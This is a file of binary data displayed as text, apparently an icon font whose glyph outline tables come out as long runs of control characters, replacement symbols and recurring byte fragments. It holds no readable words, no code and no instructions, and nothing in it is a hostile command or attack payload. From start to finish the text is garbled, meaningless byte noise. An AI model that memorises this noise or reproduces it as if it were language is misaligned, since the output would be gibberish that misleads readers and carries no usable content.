	�	�	�	�	�	�	�	�	�	�Z���� �N�H��@`�J������H���	vN�"~��
d
�2��*�"P~�(�D��0H�`�|�Npl���B�6\��j���.�!>!�$$�%�&&�&�'�'�))6)|)�*R+p+�,&,~,�--V-v00Z0�1d1�22B2z323�44B4�5L5�6�77|7�8�9$989v9�9�:z:�:�;;�<<@<�==X=z=�=�>P>�?*?�@@�A$A�BRB�C(CzD�D�E>E�FBGG6GPHXH�IFI�J~J�J�L(L�MMzN\N�N�O^P�P�QnRNR�R�SDTZT�U6U�VV�WWnW�W�X*X�Y�Y�Z\f\�]T]�^^B^d^�_4_�_�aaLana�a�b4dd\eeDe�ff4f`f�i�j�kk�ll^l�m2o�pxp�q(q�r*r^r�s�s�tt�t�ufu�u�u�vv�w<wrw�x�yfy�zzlz�|@|�|�}j}�~(~�~�v�������ЁR����j����̄��2�R�����2�����抐���V�،�����b���P�֑Z����ܕf�������>�~�������@�p���<�؝��P�����d� �Z�ܡ��$�f�ȣ4������b������L���������������B�n������j��\�(�l�*���ʻ�B����x�코�Ⱦ(�T���п����z�:���Vʮ�0���jό�R�nҐ���0���2Ԭ���lֆּ�$ט��<�\ۊ���ܺ�2���6�����;2#!"&54636767&#"&'&''3#"'32>54���/(S5	"$-	.79X)���`�
0!@
$:T-����%+537#54>;5&#"#3#"&5463!2�U<	E
$(/==�`p���D+
	</*2D�`����52#!"&546335#6264&"54.#"#5#354632�

��

gC  @!!@C�
��

�
�������u"�j
h	����V[cipw}�2#!"&5463>54&#"54&5".'&'0'43767.547&7662>&&364#"32&'&6'6&'6'&&6'&'6'"����2=aEE]>2	 	
	+
S
	���`��W7D]]D7W
 
		
	)
@	���0#"'327"&'327.=&547&546326767�(ItFXII:#5

	&/'q@=+.$"(	5iW6/-)+
 81:+>!%
 ����%+537#54>;5&#"#3#"&5463!2�r:	C
$'0::��
��r
�C+
	=.+2C������emu}�7#54366'72&2&5<54'>54&'6'&&".&'./"2?'.5466'&'6'&6'&'6&�!(GDtC]K	$
"
A%	"

 
	L^�,	"	3�@pDS�? (%
			%!(
0�Sh���
!	����J#"'6?32654&#"7>76'&54632#"&7>54.#".5462�g&# 7IXALW=3.:$
GW��'Α(;YA=RX>9
"+A9,!4
$
		"	g.~Ng�����R+6?32>54&#"74676'&54632#"&7>54'&#"&5463!2�� %:!WAKW=2-:#
Y`p��$;(F*=QW>8!+@8, 4#		7 
`����+72#!"&54632654'#3#".546327&#"%5#5##335���t+5^9$');;���`��6,"%;R;Rt�'%#"&4632&#"3267#53##5#5353�fRPppPK54. 7 F126mn888778�Sip�p22 8!2G6C88888��%3#3&"&462#54.#"#33>32d]],  , T]	!]Z
. "-	+) ,  ,���
*#�+))0!��
3LT6#".5462#*.'&547&5472632>34&#""'&#";2>&2"&4�#9	) 76-*#1*/*&1"'@(",0+
"(*&00/d##�&$$;$	(7A0
	.w#00#&
+V$&$$&
{%#76&+###'!2�a41<a;S<a<-t>$%
�����`--=����!'7#3/#3?#'�#����56/ca���t440�>&L�1����'73?!7!7!7�@�Rt���M�����PP_),,aR5R����.AT%#5"##5"#723>75."#57536353'262>54.2>54.#6MGB1
1	X

T
1
1 
�
	
! �R5,DCCD:�4ONMO:T`
	�	


2�$'#"'&'.'547>7>7327'&j,,�*'
j,,�*�Ǐ�D$#
	Z+%CY+�RQ������#70+"&?'&6;2%+"/>76;2�F
AE,A	�[B\H)
B�|	zL	V��	�6H	���� 12#!"&54632767'&+"3%6&+";26/���\0 .1
/fB/B���`��	U7	6W�	�x	w���'7'7757'7�����������������LUTTUTTT��UUT�TTTTUTT��~�%'?'7'?'#553!53#	���z��w w4��(��(�')'.��$T%�����((Px��x������3k2"&4264&"6"&462"'&'.5&47676762><.'&'.*#*:3:>76�`CC`CT>,,>,�\C=�=!
!!=�=C-#)(#
#)'#3C`CC`{,>,,>�6�=C! �<!"C��#('##)
����2#!"&5463264&"264&"���F5%%5%�5%%5%���`��%5%%5%%5%%5����
#$"&462'373�A�9�Α��-��"�"bqΑ�Α����44����!23'!".'45467#�D��D
$���_�	�ד���:�)#".=#"=47>76;232+7665!*>
/
*(F
T

T#!	 
.,�
DB%
s
R
�@
����72#!"&54636/&'&&=32=4+54+";32���44,	1&*���`��(
S4H
8+Z��y�&%"&#"#.'&54672326''&7>7;=: ./1E.8@938 %&�?&P26*'?F(n&( (����7#53537#�������b�������"� ����$;DP_7"&=463253+&=#&=#"&7#4>7'&7676&4&"3264&#"322#"&=46Z
�&��66"�	we
	�tt���====�#$$#52
tt
	����k~���
)C#'476#"&"54762"10'&'&"#'.'&'&76'&5476767>7&767674.>32&63"6'&""60'&672676&367676'.'&#""6&/&'&6567656767636'6'&'"&#&'&''.'&'&76#%4'.'&'&'"1767>&72132767>2#"'&��

%


+! 

!

�	
0


(

	
$29#%
	
	


	

	 �E��
	
.3% "#"(#*%9		)	<
	��5$	
2#1!.2
 3$
		&
#



����".6<2"&4%6&'.>'7&>7&''7&'67&�Α�Α�:#		IKG'd3+$"7�0!^e$�76H%
lnR.t3
 =Y�M?E��Α��*
JR#9C&(,9!A�R<8.
 �%MSK.4ZP����S%#"'#"&547&546326322654'&'.543232>54&"#".#"�B.&UxB.&Ux�-C[*DWA		



G�&.BxU&.BxUr-)9	()

	
&��t�?2+"'&54636&+"?>;2>7676&+"&=4>;2>5C0	
S�
�	Y	I
Z	j� !�	��J��l%	
������#52#!"&54=46354&+";26754&+";26�!��!!�SS�Q
Q�!��!�}(!����{������2"&4>&'&'.�Α�Αk!&"
q��Α��Q	
	
 � 4`M0+".'&#"#"&'.54;2326=.54>;227>?6;2!)"
;


(/`$"-;=]$		;JD3	


&!
84.[0


=`	
W	
t<	�
&0>JT\6&&676&"&547676766.766&76&&6'.7>'&>&7&76�
&3
�U�LH<,<IB@D4	_@@S_@@E2U&%J7CA 

< c
		
9$

��L=CLH'155+.iS3DS3w
.Z05R��	53	

		
����	&54>7"'>77.=�RB:6^:)?8-??-7!6'XvR� EZ=iE
�Q..QX3?M)��\Z������R%&/#"43267.'>67".'665.674>2/>�21-a90Q%/,7%$4##&
#*)

&&7�&'
>H;3	-'

$,

"$$6
*+(
%2)%
����7!+5#"&=!%5!'2!5463�&W�&��d�A&�d&t'ZZ'-UUnUU�((����42#!"&54636'&6&'."6323276���P2B!
	-A@���`�?N		 *f
#!3TR����+4BKW7"&46;462"&5"&4622+"&54>3462+'"&=46322"&=7"&46;2#^&/''/'/v

3&/'
/'/v�'/v3&/'
/'/v

��&/''����/7AIQ.54'76&#'&33'76&#"#>32"#"#"'76546"&4624&"2>e6BeL	"8!/M	#^7S=�A#$�:0A<�Α�Ά�ċ����g>-"4G�		[��,48":�	2/7:b�($Α�Α��ċ�ċ����%.546777'7&'57DWumS7EM:D��%(E3# R85Q
+	8$&:T!���+����7&#"7.'327>7327�		    g	;/%���9*7-39�`O$4����%#"&4632.32>7#53�kg��gaEC YM7Z@#7���j��ΑAA!M2A\#"V����;IU6"&5462$"&462"&'7264&#"'&&#"32>54'>&6"'&7672"&54>��Α��

$28=2$	N61$UL
C�

�Α�Α�
NV
(7$t
Y


����
%5`%"'&76276'#"&5463272#"&5467#!"&5463!2"&'73264&#"'&&#"32654'>&RHW[���`d'6;B6&T:;Sf1���`�
U]!	*<<*
!����%92"&42754&""&=#326=405#"&='32>�Α�Α�",>,

:,,�:

",#��Α��!


+*l

-.,+kq.0

/
/+#����1%"&=726='54&"#"&=332>=462�B]B"4�B/.BV
C[C4�F.BA.FGH:�.AB.FE
�-?@-$����%3#!"'&'&'.5463!225#5#"3326���	`��	��	|��
`����	��	 `	!%)53#55#%3#535#75#53#535'35'3#3#R3�RH��RRRͅ�R�4444L���]]��))]])��)�]]u3�����	#2B#"'56322#"'567#!"&5463!22654.#"#754&#"7532�

G

���`��+"-3�+
4!DiD���`�/ %	�
3:B.�
3��9�@D����7'26322/>&67>77367>?"&75.#	&'<7465&#".'&'#"&54?.>3263263232654.547'6'632763'7>31#��	376I
	
G#


,g�;
#,
	"	?!
,�	�	0
5/)



'�	E<
��		-


\���	PK<	
3		! 

4.

"
	

#C�3^ ����(:T#"&54>767676'&#"&/"6'763276&'&"76'&#"#".#">2@	&pNNt&	(
 +
$P&	
	
V

=
"+#3(*	
0M,E'RhmQ%D*#&
��	D%**"$

1����1Je46326&".'.7.67>>32'64&"#".'&'7264/7'#"&5467&72767#!6*,
d,3!
�V6"#-,
Z�#9,d-[(b0'(7#,,

Yd#*,d,2"6!_U
#!8--
Zl!#

,d,[	(0'(#!7,-X@u397+32'3254#254+%#53#32>73#"&546323&#"�AH5��q�O/5
:8U���8�!>\<GI::C�s3 �H34cX3NS+(�/3b�#� "VJ<;MP7����
#'3H7+532'+5322#>7#!"&5463!235#4'654+32674&"327##"534�-.+(�?���`�NN+#>Z]'�$?(
2"	"d�47--���`}�)

0�+ +* /
#����!2:B%#"&'326'7654&"&'>32>&/6'&'6"&462264&"�BsCU�_&*T(87M7;��bg���

 	(	�3%%3%R''�CsBeO' +<8''66'V
7`���
	(v$4$$4&&����6>I>&/6'&'2#!"&=326'7654&"&'5463"&462264&"�&���Y'O%53I38u0""0#;%N&&^��q%(84%$33$Q
0��"0""0$����.C2"&42654'&327672654'&#"327672654'&#"3276�Α�Α]	
`�

|S Md20
?0$	
R{B4

<�5��Α���	9	2B
-
L
0
��@�3#0#57'#53?3@b[�
,	]]V�+	bc�
�	T	]�	�	T	5�K#-9DN`u�����7#"5'743272#"5'7472#"5'742"5'?2#"5'7462#"5'762"5'?#"5/7547632#"'&5'?47622#"5'72+&=476326%2#"5'74'2#"5'742#"5'7o��	s~!..!�	7O��.�AEEA)iEEi�DD�`####9989DBBDFDDFr�@  ��:B��CC�8/ !.	�	I6<�AA��CC��CC�����+%#'.'367.54632&'654#"�O*+%$
J
;+-%+7/(0

"L�44\
;K~Km�5,>N12A)<:

.:9��� $(+/&=4?67'775'?'7'75�

��

�
_MجM_�7�_M�NNNd�M_�7 �����;g?3ss3?5J%�g?3444�s3?5J%��A�$I%##"'.'&676'&76067>6&'&5.*&'&35236'#"'.'&67>76'.5676676.&76�"	$#�J$;
'&/("MD7
+
"/26(&"#
D��+;'I!
,!%B'
$	"1�D$ 
."#C1)6%	(�$X6%		
('B<s L
!
		&&H	
%	
/,
����["&7>721>?>././76&/7>?>?>./65g�<7
		

-,		


(�8�h<i#36B

 
	
	32
	
	 +3
	A911D+m�	����)6CKSb�&#5&'&'&5473.'77'>7"67527'676"&4624&"2'67'654'7&'"'7&'&'7&47'6767'6327' :a

)=�

�:b);

a:=)$b:=)o�Α�΅�Ċ��c

�

4	@@	4


4	@@	4�90	.�	2991	w90	
/-	09.�
	09/�Α�Α��Ċ�ĊW2r1	�CC,,CC,,����CKUn72#"54746#"%#!"&5463!2#&3254.547>54'6?#3&464&#"32#47##2313275#"=3�M��`�>

!'A9((



w%(

	%dt

���`r$"6		
"�

�3!? #A����#+5Q]e74>27#"&5475&675."3254'254.#".="534'33&#32#".54632#64'*8	$ &Z&6-W'+&-

h83 �		
8�!-
2
-

L#)/*��""20

X0 	0[!
	o������!!77#.'#3��@�Q#	%P��@�6�-/0"�g��g�-'&67&632'2'&6654&#""'&>H	77 !;k�Eb{Q>jP9%>"
	'M0_�93!!sDbENeRC9P$9G#	(VG-����2$./"'"'&67.5'"&6767&632�n##m 	
!QRQR!
7	
7
	0 Q^yx_Q 0
��3�(6GS"#"'7&54632&'"3264&264&#"'#"&46322>54.#"32>54&#"�E`
1DNrQGq	r

��D6(F``FBc�
o
Z@	";7ME`N;5



0



�=40
SuST!		����F^2"&462"&46'&7<5"&#'&7&'&625463!254.#!"636626�3$$3$�3$$3%�#G6"(&	&("6H#g
��B)

 *D&!0""0!!0""09*f4!
*)!4g+
�
��	�

����	!##5#5!3735#5##5(�uW9<k���Z9k(C(���u99:���99�uuuu������&3@7&'&7>.?6'&7&6&'7&?>%676/&6*dk5	J+mi
"Z	
k	>!��6:
"	h�1 
,)
�Ro

�"
'�
[	�
�	�������"K7+"&7>3262"&7#*+"&76763:>7676oK;H$
*m�$y@
  �s	O,Y�BpW�	����
)&'>&42#&'&6373#&&'&'&6;2�507h<�m~r
|JYAUM21c2
">LvnM	X�¦nfja��JH��@�%)HS%#70>?#!"&5463!27#/&'#37#74'&56367&#"#"/26'#"3673�!m� ��X@+'@$�(�"$'�  <*4�&+���`��jG���2
!

	#�
���@�	
4BR^d���������
-9F$"4!2#"462#72#"42011"1"1"1"1&1<143413030310030410+353#!"&5463!2327&67&#"64'4#"&#"5#3<>323<>3237#&#"327374&5427&"'63'=35#5##3734#"7'&7&5#3546467&7'7#&737&5#35467#&7373535#45&1&0#"0#111323210606107#'#537374&#"326���xuuJ� ��Q9*#76#*9�555Y	-

(	#


	:


	5"

*Q9*#67#*9Q1	Z��`fsQ-�,�)�))�v%	
	
%	
	%	
	 	
		%	%			|~U:Q-�-Q��@�'3:BSkuy��%+53272#!"&54633533'654.*#35#535#535+37#&"264'&75&546"'654&'&5467&2654.+35#5!26%+532� �
:-r#$;%%^! a

,
$l
[�3�z�	�*		�
���`�R!!#RTT7:%%
/

	




RRR�� i	�6����A�.7:AMN`g{~1Iamxy���#<.+#532254+2*##'#5377'#3#57254+'#3#3#53#54.+#532254+'#5#'#'##7353733':>7#!"&=3673353>7352335;67323535#&'#&'#"1#"5#.*+.'#.'#5463!2"#"5*5#."&*#&+.'#3673465273<523272?"+73254&"&54;254&&54;#"6+5'#3##53'63023"'&47'3*;735353#'#'##"543'3#E'
!BC3)$$j?

'&&'77I�
'�"#��
� 5�B4)(+ (g.(�#		O

:SR
0'�$	  
!W	
!	
 
'&&'889	""!Lp
	EZ	E6
	8	�Ej EP6666EBB//(�Z�						\	

		
&n�]
		
<	
(

(
E^
7BB11E44"#(E��@�	,AXr����7#"54632'2+743!2+7437#!"&5463!24+";2?46:3267#"&#"327;2?47454+"'&+"0;274+";2?>:1267#"&#"327;2?474+";27'2#"546�

	j	 �� ��@"(T
%@
�"(T

,J

�	
	
!
���`�f

@b\'&nf

@!h1	


��@�#@PZ^bq�%2#4>2#"'5672#!"&54634.54325&#"#"'32675#53275&=5&'#3565#752654&#"'#757454&#"3275#"'�
$	q


�� JE#e
$
=$$$n $
�
�		5���`�	"			"Lr
3!}U
b}}��! "	�(	3$
	1OX7#"&546323254.'&54632&#"	#"&'.#"26?�#>BD@%)=

D<-^;+


zFE
) (&		Q
FCFM%<-'J#
	

Q60	(
/3*	����g2#!"&5463254.1&54327&#"2#"'.	#"326?'#"&54632���L	$:%+
&.		
(+#
		
���`��3	/%.
0,&
  ����;G2+#"&'#"&46;&546324'!"&463!.#"!2#!326%32+"&46h

5�gL|C

5�gL|��

^8Su*

��^8Su���

�
 g�TDg�TD`/9uS/9uk.����'/8E��%#"&547&54632&54>32>32654#"6'&"32654&>&'.#"723201&'"##"&732654&#"32'67&[!iVF_3/%7
P!"/�."	=0�
Y!r(
1
	.	C-A6	�0&Xs\99#��3%/^�xeC�
Q\�P:(
'!	;A		

?$!)/�����#%#!"&5463!2#37�+V��`A_�_[p)��`��*��[[
��3�JMR_finquz�������������%#"'#"'##"&547'&547'&54?4&14?&54>32362363225#7575'#075175573'7'37'77&='&'#'#7#"7'"7'737'37#3'#362?#6?#747'74547'67&74kj	476	8jj8��,,-,3483,.,rb@#�PSPY|D"uSb:�9
h3�Kx63)O<<$$kR#[c�i\&\a|sZ#V.#�
_Z	Y_
\
a`	��L30?\4Z`�H!<KfC��RXT\G�|Xed<=y66G6QS+U?sL&2;V�_Z__S\=lO�����
7+"&=4633'54.+"Gf5&�&55&,�3	�
Xh�U%00%�'7��5{		
�
����	'7&54632%&'>7&'677&'>7�\\�gq�!!�p$74(-CyU�#"�g�\�$�a!�rp�!��0>}B-k#�Vh�":�%:#&&#"6326"'&#"&#"+632632&#"&#">32632�8/-:8C,0=*)�$"75>))>57#"*>G@**@G>"/6>))>6/"!18//8#9Q�+)��))]##��&&��	��z�,<M]%#!"&5467&54>32>3254&+";26754&+";26754.+";26754&+";26)5I2��2I' '[:Ec��				Y				Z			W				�
C+3HH3$<&8HcE�o		o		�		�		�	�		�

�		'����#'+/37;?CGMUuy}����������������?7?7'777?#5##5##53#53#53#5##53#5#57#5#53"&462'6#"'32654&&543237&#"'#553%#5!'%!5!#5#57#553'53'#55353'#53#55#53'#5d����,r�"
"
"�!�"Q"=!�"��Q"$"�L66L5�!	 	ya��*�����z��z�"�!��!Q"u"/"&






B
	


>

g















��""�"�5L55L:
I""�""M!!0�jbb��U�;;�!!+!!��!!+!!xM""�""�"""��"*2#!"&546;235463264&"264&"��>j��7''7'�7''7'���L((��'7''7''7''7�|Y%#".#"327>32#"&54>3232>.#"#"&54654&#"#"&547632632�D26()!)'5*9
<+C; S(@Z)F*!<,,"'%.&		%	!
C2(&@3%.Bw1B#-/,$,>>,*"R?*E&",/,"))	2A	,%3	>����@2#"&'"'&54>7&547632>54&#"#"&546�Ik$=&(		


%	&	A5<P	+{�\I$D:",

0	Eh	 0
K 214:N<,>0Pd���� H#"'7&546322656'&"77'&'&5476323217676}C�\91v �\\\Ln96�mF+�
	)1-	!
_CZ\�s3<\��imLJ86lL5-D�?	)	
����3#3#'#53'#53'3377#�00DRgYYgRD00@Q^Q�6�p0 0��0 0p����@����(!!5#'#35'&753735'&75&7��@tS;DW Z O	Cv��@V��"�&&s��������!7#/#3��@�N!.-#L��@���[
[�^����B������������'8I[nz������%'''.567&667&674665".'&7>762263&'&'45&'&67666667&6767&'6:>5>"23636#6666'6&'.6767&'"#276&67&54&&7&'6757"2654&&#327>'"#276464'*#'7>7>7&7.#'&''''&'&'65.'&26'67&'.''&'5767#65&'&'&7&5&'6&3>.>6&5467"&7654'64>76&%'.'&6'&'&6=3
��3	
!	
(
!'%
/�T'
	
	N
4	�P
2

�#-?,,T"5#J	$a8
KQ/K*
	


1
255+7S
98��717�2
$�B!<4��
%� 
%0��
%
	
))	"

G	"G%
"$	
	
�	
!
'(!$
	!&'	("�# -- -�# .&

$6 	( O
4*!


�
&	O6R
		"3%& �
 ��	

	�#

�	H	
	+����0$"&462"2"&42>..'�&&�&&Q';('33&XQ:aB9*e�&&&&)#,8%'
 ,)����#3?OW_2"&4#;2=4>;2=4&#"54&+";26'+"=4;2+"=&54622"&4264&"��}}�}t		%$		9(-����		�		�Α�Α�������}�}}�		  		(9-�

����5
		

�Α����������@� ;Nc%531"#527#!"&5463!2##"'232>4&7.675&464.'>54.'+326�&

((h� ��v9
�73!"651""1�	
	u{� 
#���`� %	!!
2
=
���@�
'62"&45>54.'72#!"&54632654&+"3��gg�g� ((p(�� OywQ[5X4rOpg�hh���9F8

8#x��`�`qMTn0Z8Np����)8D7&#"327#".54632&#"327#".54632'2#"&54>2654&#"�!
!!	,
-.�!	!!	+-.yi�)EZ0f�?sFQzvUVuw�X'"(%$X'!(%��h6^?%�gBrD�=sXUvzQSxt7'7'7'7'77''�gg��-��4M���-��4Mg�gf��-��4L���-��4Lg	����2"&47''77'7'7'7'�Α�Α�JM5MM#~�~~JM5NN��Α���KN5MM$~|~~KN5MM
��Gk
3;MU]ju}7#"&462%2"&46&'''.7&'3>3232323$4&"27>7.#"#"#"2.6$"&46254&#"26%#"&4624&"2�		d/w%$s/0#	Z$o+)m$`
#��C_DD_`P7NP2%!VZ(!WY��*;**;': **;)''�	�%//.-"#v0  /u_CC_D~7L#1+Y(!VZ(!{;**;*H
!*;**1''��<�(4@%'&'.7617&'.7>26?6%4632"&72654&#"!9L
9L
#	L; 	140
��L6#<#LlLB&4&&rL
#	9L
M


�6L#;$5LL5%%%����D6462"7#!"&5463!2264&".#"&/&?6/67>�  ���`��/D//D%	%
0

0$

/
#
�!!���`SD//C0�	
/

0$
0
����+2#"&=46367>54&#"&'.#"2��]]��")
" 

*"	��]��]��� '!( 	������L#'&1.'.<53>7.'&#53676.#<5:3.#5�'+&2RJa
0� j
!;-�		<)&;@z�(
cZs)��%7�80

�
8=
�

B7.



{	�
����jp74>32#"&$"&4624&"27'4#"#"'614#"&'764#&5473254.#672/632327"37.#"'67��Α��v�����9+K70B
-K90@!�`��		oΑ�Α�������|
A+M90A+K8/�����
",7'>32'&4>32"&%'76&'7.547�M#f7C:@!�)#&#11F1;!<P@Jp�M*?Zx(�v,0!%B!;&1F11|S�.%�$X!�')}�\J>������%0"#"'01&'&'&'&747676747673467676773316676767"67203&'&'&'01&'#'#'>76'&"'&/32656'.'&'&>?677%06�($"?	
			%
	

.@
 


	���4,	
	&B05-)
"
	


	

A- #&"
]����%"327#"#.546;2&&'>4&'>:=`*
&=W5.F_c��g^F-0G*76+GO�Jk~0K?�dg�?�sb~bJ���	�!*2<!673#"'.546767>667&734.#"7654.#"�&��/?DywJF ">59O5E�Qap�I
	#)IY�/*=�C- DI$3 DN&# Q gFOUk+9'�%9!
*�,6�J&���27#"&546;%2+6''.'.676767&'-
P:
�4>�7#

$6� �/*A|0#>���=g>3E/;73!����J_q�7&6765>32'&62>54&6764'&#"#'&=4;2+3>.4>#".&6.'&66'47'&>3276#"'#"'&g
9((:O2	$*8'Z &&'77&
��%eU;%9HD<0%,-.
%0C#	�1�oT	
5IRR�		h
	^%79(1;	&	/ &m'&&	
�
�("Q5*E'
1*

��1&_?0J%�

����-6Nd<.#*'4632&'.54>576#".'&62>76&7>'&&>76	
JI>.9&
.2-%3%T
�$T/0^37&@9J'$	*

&
		(@�
8$+ ,W)7	
�	))


&
����	%##3#i�n1�u��hV������&#"'&'.#"'>76?676&6�Y[?'		
(	4"!]E&ArwI#-)0%
L�5-l����
!!%'7#��@<@@�@@\��@{�VV�Y����,?N!!274&#"#3235'&74=37#4754>35'"454=#?'#'##77��@�3#!�,8DSgPQ		 ��@3
	%oq%

��l�

!����*9GT%2#".547.6326?6632#"&5'632>54&#"6'&"'&272>54&#"�	{X9a8	9O	aXP9��
�ky�&1?Y)E*

0'(�	!}'ihR
����'701!67"'.5&736.'#>32��>W\Nb'4Dz�Gq$zc@h�4-6	ib6�9!.+G4];64����-%2+#5#"&4632'#"&546327.#"326�
WAX2g��gGp#��=+O>WW>H-;]7[��[:b�,a�.C&�ΑIAmnHW>>W?#/5���;����%''7'57#d%��S�}�.*�}���TA�`&�:��:�����Yeq%2#54&"#54;2354;2354;235435&4663232632#"&#"2354;2354;23543%54+";2754+";2��"*"�$$%	

%%$�����``� �    p<&    � @@@@����Y$#"'&=#;54;2+"=#".+#"&46322>7>23>32#"&'#"!546�Y�
	Y		Y	'e&**&			
	6	Y�
5$
<"		Y		,6,*:*
"	!<
#6����$+5326"&4624&+3532FFFȑΑ��3$x2F$�JΑ�Α�H3�J�|7FU%#!"&5467>322>54&'&7654&#"'&#"3$#"&764'&>#"&764'&>�"8'��/B7*X6A`	J4%?
**
%	"
	�''8C.+?3?X�


4J)!	);)x�8	-l-Ia(	H

����:7&54636'7&"76&%#/7327654'&7466*^I"<53%8C)G!G(

4RmR=#!@P_"*&�3IP
H'%*#	6$*+),IH'0A( ����&'77#".4>327''77%+*|,..C97D-,B3�O}J]]J+V��V+Y3O7&	6f�i89gKX��I^\I����'�7''7'75#'7�b�VllV�422�g��V ll VΝ2djd2�����1#7627'&73%'#762i9�8f���^���88�9�����X�ڸ	e���
	�&�������!)-%#"&'*##".67.>2%35#5&''35#�7#77#7!=ZfZ=!��**�-e)&lm��~8//8&TJ;##;JT-:� "j:	���� $(+/36:#!"&5463!24+''#"3!2#5#5?##5#5?##5���j%	o==o	j��IIIT6v���p@v�cu��j��jK22K��%%J&&�,u%%J&&�,��%%����12#'".'.&56'&'&'.V�P5QF! %&#D
	$GI&

%6(�,>=E10RG	.A9l
,!�	g,����i#"&54676327#!"&5463!24&'&#"'>54#"32321/4>14&#"3267>4>7632�	

���`@		
D+ 

"3	! +
,(0
3��`�"??%*) <

8$ ����Ha%#&#"#"&546327674"#"&54>32>32'654.#"3:>76�#2	(5R6(./

	BI%R6$0
�	
�7

8Y1'6	*-GB-XA-$f
	P		M(?������1F&'67"'.>32&#">54'654#"'6767&547>.%$
3�3(&Y;!:N3!#1	m;Ob/&KB%
0**JMX�
CJ88*p^B	T:";'AUM'79�DR;$cI)+
!2����@U2#!"&5463>''3654'5.'.5463267&#"2726&'>7����

1%D

'1$%8 c<
)	.���`��H%3+U$"#!	1./6(	0 $5
);F#�.>	

����h2"&46'.'#&76763654'&"'6'.#0"1"#"'&3263277632327>76�Α�Α�


 			
,'��Α���	

<
<
�����l%#"&#"''.#"#"'.5.'0547>7056'.'&7>327&47>3023232761�<	("*
			
	
%(	/)

$7								
I$%I

	����n2#!"&54636'.5#&76763654'&"'6'.#0"1"#"'&03263277632327>76���Z

.	
,'���`��	


<
<
����
#7463!1#!>7>7>7>7  F1GE�1YXF1��
3/#
"%!<H1FZ9f��1F&4H) ����GMSYc?27777''''"'7&'7&'7&'7&547'67'67'67'6'7'7'5$"2654
�
-
2=
@DC@=2--3=@DD@=3
-
���������ʼ���bb�bۄD@=3
-	

	-3=AED@=3-
	-3>@D�����uu�vvPm�nn�;bFEccEF����.93#"3#"&=4>73	5>574&'&'37#6734'7[��++)%6*�C(

		0!
>2��
�1=t)�)5%�)82i@E&(
3.GA1����.
���
Xcu������462#"##"'"'"'#".5#"'67&'7&'&54>3267>761>32632632$2654.#"47327654#"&4&"326574.#"26574&"26574&"2657#"&5476326262632>74&#"32>6�
	&N
		 	 			
" $6	$G'

-

��
 - 47)	1
	12M/?!FZ%"			 	 		 &3)-")R-_

	� O- 				7!25$" &(Dt	�!B6#
�		 
	 		 	

	 		 	

	 		 	

	�.iH2>.VN�*?$�)����%12"&42>54'#3#".546327&#"%35#5##33�Α�Α�#7uF)- !"13II##$$$$��Α���7#
+
 .! IfIj$##$#����=2#!"&546354#"#"'&#"5654&"32756=6276323276���.(
%"

&*
 ���\��	
�-
����BFJNRVZcgos%#/#/##&1'&'&?&5'&?&/&?2327674?677'///7'75'??'?�
7CTA&{Z"$#;F�e[yj�IP9@
F+:
>NOU\_BX@)J3�H,!6.CENd
�',�# $&9a=/�79�1��=^:�=D<�>F=,DC/DJC("?$A����4%#"'.5463232>5'654&#"327.#"'632�(;%:tKxNOwJ
r588338

+!)=	">(dAUpoV_:$

:%?PNNPON

��8}h��#".54>32.54654&'&563254'&7254>54'&#0&'<54'.#"2#"&4>7>&'&5462#!"&54>3E
#!�$:


 ,
�	" !
	'
&��	05}2
1N+'I.�
/Y!!"0$


&(1N*%H0'fm)��	����2"&46&762?7�Α�Αr�
=�s>��Α��]Yh?.
����2"&47#�Α�Α(U�U��Α�ε������.6>�%/&?6''&766'&7.7627&76"&4626&'.>;4'>4&5'676&'&.'&7&'">374'&"417670.#636=4'#&'6767-

	N
!	)!
��Α��O
	
	

	
2

'	/].('�
		
	
	$7Α�Α��
%
	 
	;	3		

!5
n*%#����X%&5>56'4.'57#.+"72>73#.'&#;2>7�
��h	
�X	C-Y
d<H�r~		
�
KI�'
	$����"3CQ[2#!"&54635#35#&'#353732326'454'.#"+54.#"5#3732'#52#"&5432���L!�++(
.�
		uU���`�[���<)�UUWW*


c$	
*�
\1T!*
���,1:Gp'"#"&'*#./&'767676767667./"'.'&>54&#">&6?6'�6873		Fm
	 D)#
!

{�
)S7�0;qPJ6I;J$	0_
3@!-
"!
	$�m>!4DUB4A%"2(
9�f
-

N4J)l^8Pr1N 	'����7\2#!"&54636&'.14"&'&'."04&'&7676&"&306/.>1276a,8'��'88'�*$	

/	$|%Q)%/�,��'88''8��IQ&/)

HQ&
/)
����7&7>7>6&'&6�W?_E#ZZ#W?`E0�4P<'D,P<;Z�W>VFe	W=WFe	�;X"@'<WN���#'"&4624&"26%'#'#7'7''7'�Ԗ��v��������W%W�/213DEDm77*Ԗ�Ԗ�\������%W%R^ddk
|D7�����'0=DMm��6&76'&'&76.76$&'&>.6766&'&>7'&6&6.''0&'&'.67&67>6.'&6'&'"'&#&'&'&767>7667>763266.6a
�	?�
1�m

+
T		FE&#'f*3T
^(+

	
		)		%
	,P		���		L�
9	

<	

w!K$
2?#J2$ A5
@`
b
"k
F
"K
	S����-=M2#"&#"##"&=&54622763232672#!"&54634&#!"3!26S
('
#"
&<��j��\�,�


	

���\�r\��	����)4E%&?'>.#"'6?'.?6176&"&463227.547�

)*'1''#.L+3 
D�:j-*�'FA6!!(/��
z $>-'<2#' V.

=Q C�*��('A&5*'8.������1S%01#547>73&'.623632&7.#.#&5&7067672?B.,]rvy3��
::�q�
z	���	;9v
�*)"%txBy+	�/	L""6
J4���AX|��2#!"&546367676'.6'<.'&67>4&*#"#"&63!22654*#".6767626325'&'&7>0&".5&7676��;�';1C#@=		73	��		�	*
	 )-4	%#	5��E&��|��
'!"			�ZG
	22!.;32H-"�����&>#"&'>76�MU,MU,!I}J=l&5V
$7�k4!bj4 ^
K~J4-F13!T����"4EM2"&46'&'"?2#!"&546337632=4&+"767676/&"264&"�J44J4�)�#��##-T
BiJJiJ	4J44J$C���##J#U-	�JiJJi����3I2"#"'&=#".5<>7>754.#"&'&'&76532�a_@5X"0
�D(V

L�E(�I?��		&	7��k

��0�NGV_cf����%777'77?'7&7>721?6?77?7?''&"76?6&2>77'/???>761?6'7?7''7#''767676'&76767?&'&#7'�###"@/ 
 x

��$!%
'%A$$%%6 	K
:(�		
;
��( 9
&		' 
+"%	)&�p
"?��qsvPS�xx$&" (uoV\>

&	B<	&(Mzfh?B)
 +.N--+$'%' *(?BO@		
&����"7?K7>32#"&46;7'&>.?6732+&'.'&67&2"&44&#"326	W?�		4BF�5		2�Α�Α�YZ~YZ~G	�
s$	�"	+"	V%	��Α��gZ~YZ~����2G2#!"&54637&676&+76.'.#"3!264&+&'>/���O�>V		A34+	3���`��!=
